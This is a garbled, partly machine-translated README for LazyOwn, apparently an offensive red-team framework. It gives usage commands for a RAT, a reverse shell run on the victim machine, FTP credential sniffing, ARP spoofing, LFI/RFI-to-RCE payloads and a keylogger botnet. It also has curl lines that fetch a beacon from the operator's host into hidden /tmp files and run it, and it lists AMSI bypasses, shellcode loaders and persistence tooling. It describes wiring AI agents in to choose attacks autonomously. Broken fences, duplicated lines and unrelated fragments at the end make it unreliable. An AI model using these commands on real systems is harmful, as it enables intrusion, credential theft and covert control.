lazyownclient.py: error: the following arguments are required: --host, --port, --key

LazyOwn> run lazyownclient
[?] lhost and lport and rat_key must be set

LazyOwn> run lazyownserver
[?] rhost and lport and rat_key must be set

luego los comandos son:

upload /path/to/file
donwload /path/to/file
screenshot
sysinfo
fix_xauth #to fix xauth xD
lazyownreverse 192.168.1.100 8888 #Reverse shell to 192.168.1.100 on port 8888 ready to C&C

image

Lazy Meta Extract0r 모드 사용

LazyMeta Extract0r는 PDF, DOCX, OLE 파일(DOC, XLS 등), 그리고 여러 이미지 형식(JPG, JPEG, TIFF)을 포함한 다양한 유형의 파일에서 메타데이터를 추출하도록 설계된 도구입니다. 이 도구는 지정된 디렉터리를 순회하며 호환되는 확장자를 가진 파일을 검색하고, 메타데이터를 추출하여 출력 파일에 저장합니다.

[*] Iniciando: LazyMeta extract0r [;,;]

usage: lazyown_metaextract0r.py [-h] --path PATH lazyown_metaextract0r.py: error: the following arguments are required: --path```sh python3 lazyown_metaextract0r.py --path /home/user

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/56369/12418a4b1a619614f513a2824b0ed26b369099b463f6e4e58c6f01389c5647f5/24e93754e70d5adbfca3184e65afb178ee598f53a3375c8029e0356233a77d8c-display-v1.webp)

## 복호화 암호화 모드 사용

물론 키가 있다면 파일을 암호화하고 복호화할 수 있게 해주는 암호화 방식입니다.

![Captura de pantalla 2024-06-08 231900](https://assets.kitploit.com/production/public/readmes/56369/67b1d3295f0fc3ebe4d9103a458fd0683ba8d78a426fc36ebcdbe6cfd8c45c87/61ff68c807f4de0641fcc5e74f9d81403d84a8f7eea58a8401e4c6e9b360e76e-display-v1.webp)```sh
encrypt path/to/file key # to encrypt
decrypt path/to/file.enc key #to decrypt

LazyNmap 사용 모드

image

Lazynmap을 사용하면 대상(이 경우 127.0.0.1)에 대해 Nmap을 사용하는 자동화된 스크립트를 제공합니다. 이 스크립트는 sudo를 통한 관리자 권한이 필요합니다. 또한 현재 위치한 IP 세그먼트에 무엇이 존재하는지 식별하기 위한 네트워크 검색 모듈도 포함되어 있습니다. 추가적으로, 이제 이 스크립트는 nmap 별칭을 사용하거나 run lazynmap 명령으로 매개변수 없이 호출할 수 있습니다.

image```sh ./lazynmap.sh -t 127.0.0.1 # or in the cli just nmap

root@kitploit:~
## LazyOwn GPT One Liner CLI 어시스턴트 및 리서처 사용법

LazyOwn GPT One Liner CLI 어시스턴트로 펜테스팅 작업 자동화의 혁신을 경험해 보세요! 이 놀라운 스크립트는 LazyOwn 도구 모음의 일부로, 펜테스터로서의 삶을 더 효율적이고 생산적으로 만들어 주도록 설계되었습니다.

주요 기능:

지능형 자동화: Groq의 강력한 성능과 고급 자연어 모델을 활용하여 특정 요구 사항에 기반한 정확하고 효율적인 명령을 생성합니다.
사용자 친화적 인터페이스: 간단한 프롬프트만으로 어시스턴트가 원라이너 스크립트를 생성하고 실행하여 복잡한 명령을 만드는 데 드는 시간과 노력을 획기적으로 줄여줍니다.
지속적인 개선: 지식 기반을 지속적으로 변환하고 최적화하여 각 상황에 맞춰 최상의 솔루션을 제공합니다.
간소화된 디버깅: 디버그 모드를 활성화하면 각 단계에서 상세한 정보를 얻을 수 있어 오류를 쉽게 식별하고 수정할 수 있습니다.
원활한 통합: 워크스페이스 내에서 손쉽게 작동하며, Groq API의 성능을 활용하여 빠르고 정확한 응답을 제공합니다.
보안 및 제어:

안전한 오류 처리: 실행 오류를 지능적으로 감지하고 대응하여 생성된 각 명령에 대한 완전한 제어권을 유지할 수 있습니다.
제어된 실행: 명령을 실행하기 전에 확인을 요청하므로 시스템에서 무엇이 실행되는지 정확히 알 수 있어 안심할 수 있습니다.
간편한 구성:

API 키를 몇 초 만에 설정하고 LazyOwn GPT One Liner CLI 어시스턴트가 제공하는 모든 이점을 누려보세요. 이 강력한 도구를 구성하고 잠재력을 극대화하는 데 도움이 되는 빠른 시작 가이드가 제공됩니다.

펜테스터와 개발자에게 이상적:

프로세스 최적화: 보안 감사에서 명령 생성을 간소화하고 가속화합니다.
지속적인 학습: 지식 기반이 지속적으로 업데이트되고 개선되어 항상 최신 모범 사례와 솔루션을 제공합니다.
LazyOwn GPT One Liner CLI 어시스턴트와 함께 업무 방식을 더 빠르고, 더 효율적이며, 더 안전하게 변화시키세요. 반복적이고 복잡한 작업에 시간을 낭비하지 말고, 진정으로 중요한 것, 즉 취약점을 발견하고 해결하는 데 집중하세요!

LazyOwn과 함께 펜테스팅 혁명에 동참하고 생산성을 한 단계 끌어올리세요!

[?] 사용법: python lazygptcli.py --prompt "<your prompt>" [--debug]

[?] 옵션:

--prompt "프로그래밍 작업을 위한 프롬프트 (필수)."
--debug, -d "디버그 메시지를 표시하는 디버그 모드를 활성화합니다."
--transform "Groq을 사용하여 원래 지식 기반을 향상된 기반으로 변환합니다."
[?] 스크립트를 실행하기 전에 API 키를 구성했는지 확인하세요:
export GROQ_API_KEY=<your_api_key>
[->] 방문: https://console.groq.com/docs/quickstart (스폰서 링크가 아님)

요구 사항:

Python 3.x
유효한 Groq API 키
Groq API 키를 얻는 단계:
Groq Console (https://console.groq.com/docs/quickstart)을 방문하여 등록하고 API 키를 받으세요.```sh
export GROQ_API_KEY=<tu_api_key>
python3 lazygptcli.py --prompt "<tu prompt>" [--debug]

image

lazyown_bprfuzzer.py 사용법

스크립트의 요청에 명시된 대로 인수를 제공하세요. 스크립트는 다음 인수를 필요로 합니다:

usage: lazyown_bprfuzzer.py [-h] --url URL [--method METHOD] [--headers HEADERS] [--params PARAMS] [--data DATA] [--json_data JSON_DATA] [--proxy_port PROXY_PORT] [-w WORDLIST] [-hc HIDE_CODE] --url: 요청이 전송될 URL (필수). --method: GET 또는 POST와 같이 사용할 HTTP 메서드 (선택 사항, 기본값: GET). --headers: JSON 형식의 요청 헤더 (선택 사항, 기본값: {}). --params: JSON 형식의 URL 매개변수 (선택 사항, 기본값: {}). --data: JSON 형식의 폼 데이터 (선택 사항, 기본값: {}). --json_data: JSON 형식의 요청용 JSON 데이터 (선택 사항, 기본값: {}). --proxy_port: 내부 프록시용 포트 (선택 사항, 기본값: 8080). -w, --wordlist: 퍼징 모드용 워드리스트 경로 (선택 사항). -hc, --hide_code: 출력에서 숨길 HTTP 상태 코드 (선택 사항). 스크립트가 올바르게 실행되도록 필수 인수를 반드시 제공하세요.```sh python3 lazyown_bprfuzzer.py --url "http://example.com" --method POST --headers '{"Content-Type": "LAZYFUZZ"}'

root@kitploit:~
Form 2: 고급 사용법

요청 재생 또는 퍼징과 같은 스크립트의 고급 기능을 활용하려면 다음 단계를 따르세요:

요청 재생:

요청 재생 기능을 사용하려면 앞서 표시된 대로 인수를 제공하세요.
실행 중에 스크립트가 요청을 반복할지 묻습니다. 반복하려면 'y'를 입력하고, 리피터를 종료하려면 'n'을 입력하세요.
퍼징:

퍼징 기능을 사용하려면 -w 또는 --wordlist 인수로 워드리스트를 제공해야 합니다.
스크립트는 URL 및 기타 데이터에서 LAZYFUZZ라는 단어를 제공된 워드리스트의 단어로 대체합니다.
실행 중에 스크립트는 각 퍼징 반복의 결과를 표시합니다.
이것이 lazyburp.py 스크립트를 사용하는 기본 및 고급 방법입니다. 필요에 따라 특정 상황에 가장 적합한 방법을 선택할 수 있습니다.```sh
python3 lazyown_bprfuzzer.py \                                                                                                           ─╯
    --url "http://127.0.0.1:80/LAZYFUZZ" \
    --method POST \
    --headers '{"User-Agent": "LAZYFUZZ"}' \
    --params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
    --data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
    --json_data '{"key3": "LAZYFUZZ"}' \
    --proxy_port 8080 \
    -w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
    -hc 501

감사합니다

이 프로젝트에 기여하고 싶으시다면, 다음을 수행해 주세요:

  1. 이 저장소를 포크합니다.
  2. 기능 브랜치를 생성합니다 (git checkout -b feature/AmazingFeature).
  3. 변경 사항을 커밋합니다 (git commit -m 'Add some AmazingFeature').
  4. 브랜치에 푸시합니다 (git push origin feature/AmazingFeature).
  5. 풀 리퀘스트를 엽니다.

라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.

연락처

프로젝트 링크: https://github.com/yourusername/yourproject

감사의 글

  • 모든 기여자분들께 감사드립니다
  • 오픈소스 커뮤니티에 감사드립니다
  • 이 프로젝트에 영감을 준 모든 분들께 감사드립니다```sh python3 lazyown_bprfuzzer.py \ ─╯ --url "http://127.0.0.1:80/LAZYFUZZ"
    --method POST
    --headers '{"User-Agent": "LAZYFUZZ"}'
    --params '{"param1": "value1", "param2": "LAZYFUZZ"}'
    --data '{"key1": "LAZYFUZZ", "key2": "value2"}'
    --json_data '{"key3": "LAZYFUZZ"}'
    --proxy_port 8080
    -w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/56369/536bf1028ec5c58968040226c36296d17707cc7236e75a4245c2618835265d78/6ff4dbf1c94f750b69acf64298b86dd7982a7ccbc25d4fdaa69b980a254bd63a-display-v1.webp)
참고: 사전을 사용하려면 /usr/share/seclists 내에서 다음 명령을 실행하세요:```sh
now the command 'getseclist' do that automated.
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip

LazyOwn FTP 스니프 모드 사용법

이 모듈은 네트워크 전반의 FTP 서버에서 비밀번호를 검색하는 데 사용됩니다. 어떤 사람들은 FTP가 더 이상 사용되지 않는다고 말할 수도 있지만, 서버에서 대규모 FTP 서비스가 실행되고 있는 핵심 인프라 환경을 본다면 놀랄 것입니다. :)```sh assign device eth0 run lazyftpsniff

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/56369/2c92e5d852a586494d37d892de49b42e849d9602a75cb399dbfef5d2aaf95b44/4cb2b5a8fa35fca9f90ac2471b81765100aaa30b84f11795ee77e727cb3113c0-display-v1.webp)

## LazyReverseShell 모드 사용법

Listen```sh
nc -nlvp 1337 #o el puerto que escojamos

image

그런 다음 희생자 머신에서```sh ./lazyreverse_shell.sh --ip 127.0.0.1 --puerto 1337

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/56369/207a550ff7c9ce047796bea119a6fd31e0f895b88a8ca98a0c2b231f6e697fd9/d03d9a1178703f93e04997e8d2b10b3a1591e14c707246e517693672653ecc56-display-v1.webp)

## 정찰 모드에서의 Lazy Curl 사용법

이 모듈은 modules 디렉터리에 위치하며 다음과 같이 사용됩니다:```sh
chmod +x lazycurl.sh

그리고 나서```sh ./lazycurl.sh --mode GET --url http://10.10.10.10

root@kitploit:~
사용법.

GET:```sh
./lazycurl.sh --mode GET --url http://10.10.10.10

POST:```sh ./lazycurl.sh --mode POST --url http://10.10.10.10 --data "param1=value1&param2=value2"

root@kitploit:~
TRACE:```sh
./lazycurl.sh --mode TRACE --url http://10.10.10.10
```sh
파일 업로드:```sh
./lazycurl.sh --mode UPLOAD --url http://10.10.10.10 --file file.txt

wordlist 브루트포스 모드:```sh ./lazycurl.sh --mode BRUTE_FORCE --url http://10.10.10.10 --wordlist /usr/share/wordlists/rockyou.txt

root@kitploit:~
필요에 따라 매개변수를 조정하고, 각 옵션에 제공하는 값이 각 경우에 유효한지 확인하세요.

## ARPSpoofing 모드 사용법

이 스크립트는 Scapy를 사용한 ARP 스푸핑 공격을 제공합니다. 페이로드에서 lhost, rhost, 그리고 ARP 스푸핑을 수행하는 데 사용할 장치를 설정해야 합니다.```sh
assign rhost 192.168.1.100
assign lhost 192.168.1.1
assign device eth0
run lazyarpspoofing

LazyGathering 모드 사용법

이 스크립트는 도구가 실행되는 시스템에 대한 X-ray 뷰를 제공하여 구성 및 상태에 대한 통찰력을 제공합니다.

image```sh run lazygath

root@kitploit:~
## Lazy Own LFI RFI 2 RCE 모드 사용법

LFI RFI 2 RCE 모드는 payload.json에 지정된 파라미터에 대해 잘 알려진 페이로드 일부를 테스트하도록 설계되었습니다. 이를 통해 대상 시스템의 로컬 파일 포함(LFI), 원격 파일 포함(RFI), 원격 코드 실행(RCE) 취약점을 종합적으로 평가할 수 있습니다.

![image](https://assets.kitploit.com/production/public/readmes/56369/3bd4f818fd3a15a099e25d21604b8362e5ce76dee05d56f182a6e4817c81edd6/7ba305b87f294e6253a90746031a826f95bf3c65a850ec3aa4e8b4b90dd41208-display-v1.webp)```sh
payload
run lazylfi2rce

LazyOwn 스니퍼 모드 사용법

https://www.youtube.com/watch?v=_-DDiiMrIlE

스니퍼 모드는 -i 옵션을 사용하여 인터페이스를 통해 네트워크 트래픽을 캡처할 수 있게 해주며, 이 옵션은 필수입니다. 필요에 따라 조정할 수 있는 다른 많은 선택적 설정들이 있습니다.

사용법```bash

usage: lazysniff.py [-h] -i INTERFACE [-c COUNT] [-f FILTER] [-p PCAP] lazysniff.py: error: the following arguments are required: -i/--interface

Captura de pantalla 2024-06-05 031231

To use the sniffer from the framework, you must configure the device with the command:

root@kitploit:~
lazysniff 실행
또는 그냥
sniff```

### Experimental Obfuscation Using PyInstaller

This feature is in experimental mode and does not work fully due to a path issue. Soon, it will support obfuscation using PyInstaller.


```sh
./py2el.sh```

## Experimental NetBIOS Exploit

This feature is in experimental mode as it is not functioning yet... (coming soon, possibly an implementation of EternalBlue among other things...)


```sh
run lazynetbios```

## Experimental LazyBotNet with Keylogger for Windows and Linux

This feature is in experimental mode, and the decryption of the keylogger logs is not functioning xD. Here we see for the first time in action the `payload` command, which sets all the configuration in our `payload.json`, allowing us to preload the configuration before starting the framework.


```sh
payload
run lazybotnet```

## Interactive Menus

The script features interactive menus to select actions to be performed. In server mode, it displays relevant options for the victim machine, while in client mode, it shows options relevant to the attacking machine.

### Clean Interruption

The script handles the SIGINT signal (usually generated by Control + C) to exit cleanly.

## License

This project is licensed under the GPL v3 License. The information contained in GTFOBins is owned by its authors, to whom we are immensely grateful for the information provided.

## Acknowledgments ✌

A special thanks to [GTFOBins](https://gtfobins.github.io/) for the valuable information they provide and to you for using this project. Also, thanks for your support Tito S4vitar! who does an extraordinary job of outreach. Of course, I use the `extractPorts` function in my `.zshrc` :D, thanks to deepwiki to help us with doc. ( https://deepwiki.com/grisuno/LazyOwn/ ), thanks to plaintext who does an extraordinary job of outreach and we adopted PTMultiTools it's very impresive

### Thanks to pwntomate 🍅

An excellent tool that I adapted a bit to work with the project; all credits go to its author honze-net Andreas Hontzia. Visit and show love to the project: <https://github.com/honze-net/pwntomate>

### Thanks to Sicat 🐈

An excellent tool for CVE detection, I implemented only the keyword search as I had to change some libraries. Soon also for XML generated by nmap :) Total thanks to justakazh. <https://github.com/justakazh/sicat/>

### Thanks to josefcohernandez

For identifying and reporting the Docker build failures caused by the repo.charm.sh outage and the Python version incompatibility. His report led to the fixes in `lazyown-docker/Dockerfile`.

### Thanks to EQSTLab (via yym8538)

For two critical security advisories that helped us harden the framework and fix serious vulnerabilities. Their responsible disclosure makes LazyOwn safer for the entire community.

## BlackSandBeacon — Linux BOF

**BlackSandBeacon** brings Beacon Object File (BOF) extensibility to Linux for the
first time in an open-source C2 framework. No commercial C2 (including Cobalt Strike)
offers Linux BOF support.

### What is Linux BOF?

On Windows, BOFs are position-independent PE COFF objects loaded by the beacon at
runtime, giving operators an in-memory plugin system without spawning new processes.
BlackSandBeacon ports this model to Linux:

- BOFs compile as **position-independent ELF shared objects** (`.so`) with GCC
  (`-shared -fPIC -nostartfiles`).
- The beacon loads them at runtime via `dlopen` — no disk writes after delivery,
  no new process, no shell.
- The **`datap` API** (`BeaconDataParse`, `BeaconDataInt`, `BeaconDataExtract`,
  `BeaconPrintf`, `BeaconOutput`) is source-compatible with the Windows BOF contract,
  so existing BOF authors can port by replacing Win32 calls with Linux syscalls or
  libc equivalents.
- Advanced BOFs can use **direct syscalls via inline assembly** or `io_uring` for
  kernel interaction without libc linking.

### Deployment via LazyOwn

```bash
# 1. 비콘 빌드 및 스테이징
(LazyOwn) > blacksandbeacon

# 2. 대상에 전달 (명령은 대상에서 실행됨)
curl -sk "http://{lhost}:{lport}/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &

# 3. BOF 로더 빌드 및 스테이징
(LazyOwn) > blacksandbeacon_bof

# 4. 라이브 세션에 BOF 로더 전달
curl -sk "http://{lhost}:{lport}/bof_loader" -o /tmp/.bof && chmod +x /tmp/.bof && /tmp/.bof```

### Porting a Windows BOF to Linux

```c
// Win32 API 호출을 직접 시스템 콜 또는 libc 동등물로 교체합니다.
// datap API는 동일하게 유지됩니다.
#include "beacon.h"

void go(char *args, int len) {
    datap parser;
    BeaconDataParse(&parser, args, len);
    char *target = BeaconDataExtract(&parser, NULL);
    // Linux: CreateFile 대신 syscall(SYS_open, ...)을 사용합니다.
    BeaconPrintf(CALLBACK_OUTPUT, "target: %s\n", target);
}```

Compile: `gcc -shared -fPIC -nostartfiles -o mybof.so mybof.c`

### Adoption gap this closes

| Capability | Cobalt Strike | Sliver | Havoc | LazyOwn + BlackSandBeacon |
|---|---|---|---|---|
| Windows BOF | Yes | No | No | Yes (via `beacon` addon) |
| Linux BOF | **No** | **No** | **No** | **Yes** |
| ARM BOF | No | No | No | Planned (`blackzincbeacon`) |
| Open source | No | Yes | Yes | Yes |

## Related Projects

LazyOwn ships as the "all-in-one" front of a small ecosystem of focused
red-team tools. Each project below stands on its own and can be wired into
LazyOwn through `lazyaddons/*.yaml`, the C2 implant pipeline, or the MCP
`lazyown_palette --info` view (which exposes the graphify-derived `calls`
and `related` neighbours of every command).

### Lightweight beacons (C / ASM)

Drop-in replacements for the bundled Go beacon when you need a smaller
footprint or per-architecture artefacts:

- **[beacon](https://github.com/grisuno/beacon)** — minimalist Windows beacon in C with BOF support via Early Bird APC injection and NT Native API calls. Pairs with LazyOwn's malleable C2 profile. Wired in via `lazyaddons/beacon.yaml`.
- **[blacksandbeacon](https://github.com/grisuno/blacksandbeacon)** — Linux-native beacon in C with first-class **Linux BOF (Beacon Object File)** support via ELF shared-object injection and direct syscalls. BOFs are loaded at runtime through a `dlopen` runtime — the same extensibility model as Windows BOF but targeting Linux kernel internals. **No commercial C2 framework (including Cobalt Strike) offers Linux BOF support.** Wired in via `lazyaddons/blacksandbeacon.yaml`; BOF loader via `lazyaddons/blacksandbeacon_bof.yaml`.
- **[blackzincbeacon](https://github.com/grisuno/blackzincbeacon)** — ARM build of the same family, for embedded / IoT engagements.

### Lightweight C2 frameworks

Alternative C2 surfaces that speak the same beacon protocol as `lazyc2.py`
or that can serve as a teamserver back-end:

- **[BlackObsidianC2](https://github.com/grisuno/BlackObsidianC2)** — small, fast Go C2 server intended as a stripped-down companion to `lazyc2.py`.
- **[LazyOwnBT](https://github.com/grisuno/LazyOwnBT)** — Bluetooth / proximity-aware C2 PoC; useful when the engagement scope explicitly covers RF.

### AI / orchestration

Drop into LazyOwn through MCP, the `toposwarm` lazyaddon, or directly:

- **[toposwarm](https://github.com/grisuno/toposwarm)** — natural-language router on top of the LazyOwn command catalogue; ships as both a lazyaddon and a Claude Code skill.
- **[LazyOwnOpenCodeAdapter](https://github.com/grisuno/LazyOwnOpenCodeAdapter)** — bridge between LazyOwn and OpenCode-style coding agents.

### Loaders, shellcode runners and post-exploitation

Used both by humans through pwntomate `.tool` files and by the autonomous
daemon when the reactive selector recommends an in-memory technique:

- **[gomulti_loader](https://github.com/grisuno/gomulti_loader)** — multi-platform Go shellcode loader (Linux + Windows). Wired in via `lazyaddons/gomulti_loader_linux.yaml` and `gomulti_loader_windows.yaml`.
- **[win_shellcode](https://github.com/grisuno/win_shellcode)** — collection of Windows shellcode templates ready to be linked from a beacon stub.
- **[ejecutarShellcode](https://github.com/grisuno/ejecutarShellcode)** — minimal "execute-this-shellcode" loaders for quick PoCs.
- **[ShellcodeFluctuation_crosscompile](https://github.com/grisuno/ShellcodeFluctuation_crosscompile)** — cross-compilable port of the ShellcodeFluctuation memory-encryption trick.
- **[LazyLoader](https://github.com/grisuno/LazyLoader)** — generic loader scaffold designed to be extended per engagement.
- **[OverRide](https://github.com/grisuno/OverRide)** — DLL hijack / DLL search-order-override toolkit for Windows persistence.
- **[ShadowLink](https://github.com/grisuno/ShadowLink)** — link-time / symbol-rewrite tooling for Linux ELF stagers.
- **[netsh_helper_dll](https://github.com/grisuno/netsh_helper_dll)** — `netsh` helper-DLL persistence template for Windows.

### Defensive bypass / instrumentation

- **[amsi](https://github.com/grisuno/amsi)** — AMSI bypass research and PoCs; invoked from LazyOwn payloads when AV/EDR is the limiting factor.

### Exploits and CVE PoCs

LazyOwn already vendors several recent kernel-class PoCs through the addon
system (`lazyaddons/copyfail.yaml`, `lazyaddons/dirtyfrag.yaml`,
`lazyaddons/CVE-2022-22077.yaml`, `lazyaddons/CVE_2025_24071_PoC.yaml`,
`lazyaddons/ebird3.yaml`). The original repositories are listed here for
auditability and citation:

- **[CVE-2022-22077](https://github.com/grisuno/CVE-2022-22077)** — RTCore64.sys arbitrary R/W IOCTL — used by the LazyOwn BYOVD chain.
- **[copy-fail-CVE-2026-31431](https://github.com/grisuno/copy-fail-CVE-2026-31431)** — next-gen Dirty Pipe variant. Backed by the `copyfail` lazyaddon.
- **[ebird3](https://github.com/grisuno/ebird3)** — Early-Bird APC injection + NT Native API loader; produces stealthy in-memory Windows payloads.

> **Want to add yours?** Drop a `lazyaddons/<name>.yaml` describing
> `repo_url`, `install_command` and `execute_command`; LazyOwn will pick it
> up automatically and surface it through the MCP `lazyown_palette` view.

## Abstract

LazyOwn is a framework that streamlines its workflow and automates many tasks and tests through aliases and various tools, functioning like a Swiss army knife with multipurpose blades for hacking xD.

## Lazyducky_digispark

![LazyOwn](https://github.com/user-attachments/assets/b7e8c257-c0de-4033-bf4b-57ebc87dcb97)

      Compiles and uploads an .ino sketch to a Digispark device using Arduino CLI and Micronucleus.

        This method checks if Arduino CLI and Micronucleus are installed on the system.
        If they are not available, it installs them. It then compiles a Digispark sketch
        and uploads the generated .hex file to the Digispark device.

        The method performs the following actions:

---

[Read more](https://github.com/grisuno/lazyown)
도구 다운로드
confidence
classification
provenance
source_file
line_no
captured_at
침투 테스트 보고서의 증거 보관 체계(chain-of-custody)에 필요합니다.
최신성 주석JSON SITREP 및 target_context의 모든 증거 파일은 freshness_threshold_seconds(기본 7일, 호출별 구성 가능)를 초과하면 age_seconds, age_human, stale=true를 포함합니다.에이전트가 오래된 정찰 증거 위에서 익스플로잇하는 것을 방지합니다.
lazy=False
DynamicAliasResolver, cli/aliases.py